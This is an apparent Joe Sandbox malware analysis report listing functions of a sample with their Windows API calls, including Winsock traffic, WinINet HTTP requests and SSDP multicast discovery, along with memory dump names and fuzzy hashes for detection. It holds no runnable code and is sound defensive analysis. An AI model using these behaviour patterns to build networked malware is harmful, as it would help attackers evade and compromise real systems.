                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                                                                                                        • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                        • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                        • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3966618661-0
                                                                                                                                                                                                      • Opcode ID: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
                                                                                                                                                                                                      • Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99
                                                                                                                                                                                                      Function 00409440 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _allshl
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 435966717-0
                                                                                                                                                                                                      • Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                                                                                      • Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1
                                                                                                                                                                                                      Function 004076C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,?,?), ref: 004076E8
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00407720,00000000,00000000,00000000), ref: 0040770A
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00407711
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseCreateHandleThreadmemcpy
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 2064604595-3424199868
                                                                                                                                                                                                      • Opcode ID: 0ababd338b93d4f15b5807df93ab29fe9547c17ebc95fa2dc8514e940c4b66a1
                                                                                                                                                                                                      • Instruction ID: 1765171bc77b4966af89c460e37a8a9fa1404b8c40c23c814704cc40933dc83e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ababd338b93d4f15b5807df93ab29fe9547c17ebc95fa2dc8514e940c4b66a1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54F090B1A04308FBDB00DFA4DC46F9E7778AB48704F208468FA08A72C1D675BA10C769
                                                                                                                                                                                                      Function 0040F1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                                                                                      • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 1378416451-3424199868
                                                                                                                                                                                                      • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                                      • Instruction ID: 7e163f13d574deee43add6bab66e88a36a5285de070472799180e575aa2043d7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0F03774A40308FBDB20DFA4DC49FCD7B74EB04701F2082A4FA047B2D0D6B55A418B44
                                                                                                                                                                                                      Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                                                                                      • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3980219359-0
                                                                                                                                                                                                      • Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                                                                                      • Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
                                                                                                                                                                                                      • Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA
                                                                                                                                                                                                      Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                                                                                      • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2074799992-0
                                                                                                                                                                                                      • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                                      • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                                                                                      Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                                                                                                                                      • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3668019968-0
                                                                                                                                                                                                      • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                                      • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                                                                                      Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                                                                                      • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Send$ErrorLastSleep
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2121970615-0
                                                                                                                                                                                                      • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                                      • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                                                                                      Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2223660684-0
                                                                                                                                                                                                      • Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                                                                                      • Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28
                                                                                                                                                                                                      Function 00407390 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002), ref: 00407398
                                                                                                                                                                                                      • SysAllocString.OLEAUT32(004161D0), ref: 004073A3
                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 004073C8
                                                                                                                                                                                                        • Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004073C2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 459949847-0
                                                                                                                                                                                                      • Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                                                                                      • Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755
                                                                                                                                                                                                      Function 004073E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFreeInstanceString
                                                                                                                                                                                                      • String ID: Microsoft Corporation
                                                                                                                                                                                                      • API String ID: 586785272-3838278685
                                                                                                                                                                                                      • Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                                                                                      • Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66
                                                                                                                                                                                                      Function 0040E400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                                                                                        • Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                                                                                        • Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                                                                                        • Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
                                                                                                                                                                                                        • Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
                                                                                                                                                                                                        • Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                                      • String ID: %S%S
                                                                                                                                                                                                      • API String ID: 1017111014-3267608656
                                                                                                                                                                                                      • Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                                                                                      • Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1
                                                                                                                                                                                                      Function 0040E0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002), ref: 0040E0CA
                                                                                                                                                                                                        • Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                                                                                        • Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                                                                                        • Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                                                                                        • Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                                                                                        • Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                                                                                        • Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                                                                                        • Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                                                                                        • Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                                                                                        • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                                                                                        • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                                      • String ID: TCP$UDP
                                                                                                                                                                                                      • API String ID: 1519345861-1097902612
                                                                                                                                                                                                      • Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                                                                                      • Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89
                                                                                                                                                                                                      Function 0040DCD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
